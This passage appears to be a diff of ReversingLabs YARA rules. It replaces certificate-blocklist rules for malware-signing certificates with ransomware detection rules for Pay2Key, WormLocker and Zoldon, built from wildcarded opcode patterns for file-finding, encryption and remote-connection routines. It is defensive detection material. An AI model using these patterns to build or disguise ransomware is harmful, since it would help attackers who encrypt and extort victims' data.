?? 50 E8 ?? + ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B + 88 ?? ?? ?? ?? FF D1 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? + ?? FF D2 83 7D ?? ?? 74 0C 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 83 7D + ?? ?? 75 22 6A ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 75 07 C7 45 ?? ?? ?? ?? ?? 8B 45 + ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 74 60 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? + ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 74 37 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? + ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? + ?? ?? FF D1 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 8B 45 ?? 5E 8B E5 5D C3 + } + $v30_3_encrypt_file_1 = { + 55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 75 08 8B 45 ?? E9 48 04 00 00 83 7D ?? ?? 75 08 8B 45 ?? E9 3A 04 00 + 00 8B 45 ?? 83 78 ?? ?? 74 11 8B 4D ?? 83 39 ?? 74 09 8B 55 ?? 83 7A ?? ?? 75 08 8B 45 ?? E9 18 04 00 00 C7 45 ?? ?? ?? + ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 6A ?? 8B 55 + ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B + 90 ?? ?? ?? ?? FF D2 89 45 ?? 83 7D ?? ?? 0F 84 90 03 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84 + 83 00 00 00 8B 45 ?? 8B 48 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 74 6B 6A ?? 8D 55 ?? 52 8B 45 ?? 8B 48 ?? + 51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 74 39 8B 55 ?? 3B 15 ?? ?? ?? ?? 75 2E 8B 45 ?? + 8B 48 ?? 51 8B 55 ?? 8B 42 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 50 ?? FF D2 85 C0 75 0E C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? + ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 84 9A 02 00 00 6A ?? 6A ?? 6A ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? + 8B 90 ?? ?? ?? ?? FF D2 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 0F 84 63 02 00 00 + 8B 55 ?? 3B 55 ?? 0F 87 57 02 00 00 8D 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 3F 02 00 00 6A ?? 6A + } + $v30_3_encrypt_file_2 = { + 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 0B 02 00 + 00 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 81 E1 ?? ?? ?? ?? 74 1C 6A ?? 6A ?? 8B 15 ?? ?? ?? ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B + 88 ?? ?? ?? ?? FF D1 C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? + FF D0 85 C0 0F 84 52 01 00 00 C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 51 6A ?? 6A ?? 8B 55 ?? 8B 02 50 8B 4D ?? 8B 51 ?? 52 8B 45 + ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 0F 84 0A 01 00 00 8B 55 ?? 8B 42 ?? 83 E8 ?? 89 45 ?? 8B 4D ?? D1 E1 + 89 4D ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 CC 00 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? + ?? ?? 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 74 76 8B 55 ?? + 3B 55 ?? 73 07 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 5F 8B 45 ?? 50 8D 4D ?? 51 8B 55 ?? 52 6A ?? 8B 45 ?? 50 6A ?? 8B 4D + ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 74 21 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? + ?? ?? 8B 88 ?? ?? ?? ?? FF D1 EB 15 83 7D ?? ?? 74 0D 83 7D ?? ?? 74 07 C7 45 ?? ?? ?? ?? ?? EB 0E EB 02 EB 0A 83 7D ?? + ?? 0F 84 54 FF FF FF 83 7D ?? ?? 74 07 C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? + } + $v30_3_encrypt_file_3 = { + ?? 8B 88 ?? ?? ?? ?? FF D1 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 7D ?? ?? 75 47 8B 4D ?? 81 E1 ?? + ?? ?? ?? 74 3C 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 6A ?? 8D 4D ?? 51 8B 55 ?? 8B 42 ?? + 50 8B 4D ?? 8B 51 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? + FF D0 EB 07 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 83 7D ?? ?? 75 20 68 ?? ?? ?? ?? 8B + 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 07 C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 + ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB 07 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 + 8B 45 ?? 8B E5 5D C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "FAN-CHAI, TOV" and pe.signatures[i].serial=="05:22:42:ac:e5:83:ad:f2:a3:b9:6a:dc:b0:4d:08:12" and 1573603200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ((($v30_entrypoint at pe.entry_point) and $v30_api_load and $v30_calculate_hash and $v30_dll_load and $v30_1_find_file_1 and $v30_1_find_file_2 and $v30_1_encrypt_file_1 and $v30_1_encrypt_file_2 and $v30_1_encrypt_file_3) or (($v30_entrypoint at pe.entry_point) and $v30_api_load and $v30_calculate_hash and $v30_dll_load and $v30_2_find_file_1 and $v30_2_find_file_2 and $v30_2_encrypt_file_1 and $v30_2_encrypt_file_2 and $v30_2_encrypt_file_3) or (($v20_entrypoint at pe.entry_point) and $v30_api_load and $v30_calculate_hash and $v30_dll_load and $v30_2_find_file_1 and $v30_2_find_file_2 and $v20_1_encrypt_file_1 and $v20_1_encrypt_file_2 and $v20_1_encrypt_file_3) or (($v30_entrypoint at pe.entry_point) and $v30_api_load and $v30_calculate_hash and $v30_dll_load and $v30_3_find_file_1 and $v30_3_find_file_2 and $v30_3_encrypt_file_1 and $v30_3_encrypt_file_2 and $v30_3_encrypt_file_3)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_Bebef5C533Ce92Efc402Fab8605C43Ec : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Pay2Key : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Pay2Key ransomware." author = "ReversingLabs" - id = "59d3dd01-47bc-59ee-8fe7-fd5b1af8f9f4" - date = "2023-11-08" - modified = "2023-11-08" + id = "2e482222-0483-5fe3-bb87-cfadda8e7e7a" + date = "2021-04-14" + modified = "2021-04-14" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4270-L4288" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "daa57ad622799467c60693060e6c9eea18bdf0bb26f178e8b03453aab486ccf4" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Pay2Key.yara#L1-L99" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2497504f3afc99523cb29e51652a24f4374316d57d4baf5cde8d22e75a425585" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Pay2Key" + tc_detection_factor = 5 importance = 25 + strings: + $find_files = { + 8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 83 C8 ?? 57 8B 7D ?? + 41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ?? + ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? + FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 4D ?? + 56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 C0 50 + 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 + 89 45 ?? 8B 4D ?? 53 8B 5D ?? 56 8B 75 ?? 57 89 B5 ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74 + ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 53 E8 ?? ?? ?? ?? 59 59 8B C8 3B CB 75 ?? 8A 11 80 FA + ?? 75 ?? 8D 43 ?? 3B C8 74 ?? 56 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 FF + 80 FA ?? 74 ?? 80 FA ?? 74 ?? 80 FA ?? 74 ?? 8B C7 EB ?? 33 C0 40 0F B6 C0 2B CB 41 + F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? + ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? + ?? ?? ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 + FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? + 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 + 74 ?? 80 F9 ?? 75 ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? + ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? + ?? 85 C0 8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B + C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 + ?? E9 + } + $encrypt_files = { + 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ?? + 33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B D9 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? + 8B 43 ?? 2B 43 ?? 75 ?? 8B 75 ?? 8B 45 ?? 8B 4D ?? C7 45 ?? ?? ?? ?? ?? 89 06 89 4E + ?? 8B 4D ?? 89 4E ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8B C6 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C2 ?? ?? 83 7B ?? ?? 74 + ?? 8B 45 ?? 2B 45 ?? 50 E8 ?? ?? ?? ?? 8B 75 ?? 8B F8 8B 55 ?? 2B F2 56 52 57 E8 ?? + ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? + 56 89 75 ?? E8 ?? ?? ?? ?? 56 57 50 89 45 ?? E8 ?? ?? ?? ?? 8B 75 ?? 8D 45 ?? 83 C4 + ?? 50 56 6A ?? 6A ?? 6A ?? FF 73 ?? FF 15 ?? ?? ?? ?? 8D 4D ?? 85 C0 75 ?? 8B 75 ?? + 89 45 ?? 89 45 ?? 89 45 ?? 89 06 89 46 ?? 89 46 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? + ?? ?? 8B C6 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C2 ?? ?? FF 75 ?? E8 + ?? ?? ?? ?? FF 75 ?? 56 8B 75 ?? 56 E8 ?? ?? ?? ?? 8B 7D ?? 83 C4 ?? 8B 4D ?? 8B 45 + ?? C7 45 ?? ?? ?? ?? ?? 89 4F ?? 8D 4D ?? 89 37 89 47 ?? C7 45 ?? ?? ?? ?? ?? C7 45 + ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 8B 4D ?? 64 89 0D ?? ?? + ?? ?? 59 5F 5E 5B 8B E5 5D C2 + } + $remote_connection_p1 = { + 55 8B EC 83 EC ?? 56 57 6A ?? 8B F2 8B F9 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? C7 + 45 ?? ?? ?? ?? ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 6A ?? 56 57 FF 15 ?? ?? ?? ?? + 8B 75 ?? 8B C8 8B D6 E8 ?? ?? ?? ?? 8B 0E 8B F8 83 F9 ?? 75 ?? 68 ?? ?? ?? ?? 8B CE + E8 ?? ?? ?? ?? EB ?? 81 F9 ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? EB + ?? 81 F9 ?? ?? ?? ?? 74 ?? 81 F9 ?? ?? ?? ?? 74 ?? 85 FF 74 ?? 5F 83 C8 ?? 5E 8B E5 + 5D C3 + } + $remote_connection_p2 = { + 55 8B EC 51 53 56 8B F1 57 8B 46 ?? 83 C0 ?? 50 FF 15 ?? ?? ?? ?? 80 7D ?? ?? 6A ?? + 74 ?? 8B 4E ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 5F 5E 5B 59 5D C2 ?? ?? 8B 45 ?? 8B 08 + 83 F9 ?? 75 ?? 8B 4E ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 5F 5E 5B 59 5D C2 ?? + ?? 8B 45 ?? 8B 7D ?? 57 89 45 ?? 8D 45 ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF 75 + ?? FF 75 ?? 51 FF 15 ?? ?? ?? ?? 8B D8 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? B8 ?? ?? ?? + ?? EB ?? 3D ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 44 C1 85 DB 74 ?? 3D ?? ?? ?? ?? 74 ?? FF + 75 ?? 8B 4E ?? 50 57 E8 ?? ?? ?? ?? 5F 5E 5B 59 5D C2 ?? ?? 8B 4E ?? 57 E8 ?? ?? ?? + ?? 5F 5E 5B 59 5D C2 + } + $remote_connection_p3 = { + 55 8B EC 83 EC ?? 56 57 6A ?? 8B F2 8B F9 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 45 + ?? C7 45 ?? ?? ?? ?? ?? 50 FF 75 ?? 56 57 FF 15 ?? ?? ?? ?? 8B 75 ?? 8B C8 8B D6 E8 + ?? ?? ?? ?? 8B 0E 8B F8 83 F9 ?? 75 ?? 68 ?? ?? ?? ?? EB ?? 81 F9 ?? ?? ?? ?? 75 ?? + 68 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 FF 74 ?? 5F 83 C8 ?? 5E 8B E5 5D C3 + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO VEKTOR" and (pe.signatures[i].serial=="00:be:be:f5:c5:33:ce:92:ef:c4:02:fa:b8:60:5c:43:ec" or pe.signatures[i].serial=="be:be:f5:c5:33:ce:92:ef:c4:02:fa:b8:60:5c:43:ec") and 1587513600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($find_files) and ($encrypt_files) and ( all of ($remote_connection_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_1D3F39F481Fe067F8A9289Bb49E05A04 : INFO FILE +rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Wormlocker : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects WormLocker ransomware." author = "ReversingLabs" - id = "0c4b6efb-c793-5505-bcd6-f62266c984c6" - date = "2023-11-08" - modified = "2023-11-08" + id = "6d7b55b7-2e1b-56e0-950f-07a2d3fa17ae" + date = "2021-08-12" + modified = "2021-08-12" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4290-L4306" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "2fdf8b59d302d2ce81a1e9a5715138adc1ec45bd86871c4c2e46412407e329f9" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/ByteCode.MSIL.Ransomware.WormLocker.yara#L1-L69" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "87a4f805de78d7e7dffb176302407453108ca01552c682aeee38f8d0201263c9" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "WormLocker" + tc_detection_factor = 5 importance = 25 + strings: + $set_environment = { + 73 ?? ?? ?? ?? 0A 06 02 7D ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 0B 72 ?? ?? ?? ?? 28 ?? ?? + ?? ?? 0C 08 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 02 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 73 ?? ?? + ?? ?? 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? + ?? ?? ?? 72 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 00 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? + ?? ?? 28 ?? ?? ?? ?? 00 09 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? + 00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 7B ?? ?? + ?? ?? 6F ?? ?? ?? ?? 00 06 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 20 ?? ?? ?? + ?? 6F ?? ?? ?? ?? 00 13 ?? 11 ?? 06 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 + 11 ?? 17 6F ?? ?? ?? ?? 00 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 2A + } + $find_files = { + 00 28 ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 0A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 72 ?? ?? + ?? ?? 28 ?? ?? ?? ?? 0C 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 28 ?? ?? ?? + ?? 0D 08 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 73 ?? ?? + ?? ?? 13 ?? 72 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 00 11 ?? 09 11 ?? 9A 11 ?? 6F ?? ?? ?? + ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 09 8E 69 FE 04 13 ?? 11 ?? 2D ?? 16 13 ?? 2B ?? 00 11 + ?? 11 ?? 11 ?? 9A 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 FE 04 + 13 ?? 11 ?? 2D ?? 2A + } + $encrypt_files_p1 = { + 00 14 0A 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 00 73 + ?? ?? ?? ?? 0D 00 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? + 00 03 07 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? + ?? ?? 6F ?? ?? ?? ?? 00 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? + 00 09 17 6F ?? ?? ?? ?? 00 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 00 11 ?? 02 16 + 02 8E 69 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? + ?? ?? 00 DC 08 6F ?? ?? ?? ?? 0A 00 DE ?? 09 2C ?? 09 6F ?? ?? ?? ?? 00 DC 00 DE ?? 08 + 2C ?? 08 6F ?? ?? ?? ?? 00 DC 06 13 ?? 2B ?? 11 ?? 2A + } + $encrypt_files_p2 = { + 00 03 28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? 0B 28 ?? ?? ?? ?? 07 6F ?? ?? + ?? ?? 0B 06 07 28 ?? ?? ?? ?? 0C 03 0D 09 08 28 ?? ?? ?? ?? 00 2A + } + condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "LOGIKA, OOO" and pe.signatures[i].serial=="1d:3f:39:f4:81:fe:06:7f:8a:92:89:bb:49:e0:5a:04" and 1592553220<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($set_environment) and ($find_files) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_7Be35D025E65Cc7A4Ee01F72 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Zoldon : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Zoldon ransomware." author = "ReversingLabs" - id = "533bcad1-b589-5a05-8f35-32fcb79c7f68" - date = "2023-11-08" - modified = "2023-11-08" + id = "5d28e6f0-9d6b-54f4-81ed-aadb58352c80" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L4308-L4324" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "dad7ab834a67d36c0b63e45922aea566dc0aaf922be2b74161616b3caea83fdc" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Zoldon.yara#L1-L107" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "4821b8506e7ba00987978f2744da1c532e03d73f3275cb15e39cdf87f6018223" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Zoldon" + tc_detection_factor = 5 importance = 25 + strings: + $main_encrypt_function_p1 = { + 55 8B EC 81 C4 ?? ?? ?? ?? 33 C9 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? + ?? 89 8D ?? ?? ?? ?? 89 4D ?? 89 8D ?? ?? ?? ?? 89 4D ?? 89 4D ?? 89 55 ?? 89 45 ?? + 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 + 64 89 20 E8 ?? ?? ?? ?? DD 5D ?? 9B 8B 45 ?? 89 45 ?? 8B 45 ?? 89 45 ?? FF 75 ?? FF + 75 ?? 8D 55 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 55 ?? E8 ?? ?? ?? ?? B2 ?? + A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? B1 ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? + 3C ?? 0F 85 ?? ?? ?? ?? B0 ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? + 84 C0 0F 85 ?? ?? ?? ?? 8B 4D ?? BA ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? C6 + 80 ?? ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? + ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 66 C7 45 + } + $main_encrypt_function_p2 = { + 8D 85 ?? ?? ?? ?? 66 8B 55 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? B9 ?? ?? ?? + ?? E8 ?? ?? ?? 